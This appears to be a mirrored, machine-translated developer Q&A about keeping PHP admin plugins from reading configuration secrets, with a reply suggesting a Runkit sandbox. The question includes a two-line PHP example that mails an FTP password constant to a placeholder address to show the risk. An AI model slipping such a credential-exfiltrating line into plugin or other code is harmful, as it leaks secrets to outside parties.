[英]how to prevent plugin from accessing config files
Am writing an application which support the use plugins which can be hooked to the admin. 我正在编写一个支持使用插件的应用程序,可以将其挂钩到管理员。
How do i protect the config files because currently, if a plugin developer writes: 我如何保护配置文件,因为当前,如果插件开发人员编写:
$msg=__FTP_PASS__;
mail("email@email","subject",$msg);
The message get sent along with the password. 该消息与密码一起发送。 How do i prevent this because this happens because i included "config.php" at the top of admin page.
我如何防止这种情况发生,因为这是因为我在管理页面的顶部包含了“ config.php”。 Thanks.
谢谢。 #am sorry, i dont know how to format question on stackoverf
#am抱歉,我不知道如何在stackoverf上格式化问题
You can prevent this with some sort of PHP sandbox (runkit's Runkit_Sandbox class comes to mind), but it isn't a standard part of PHP and using it properly will not be trivial. 您可以使用某种PHP沙箱来防止这种情况发生(想到Runkit的Runkit_Sandbox类),但这不是PHP的标准部分,正确使用它也不是一件容易的事。
Letting users run arbitrary code is never a good idea. 让用户运行任意代码绝不是一个好主意。
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.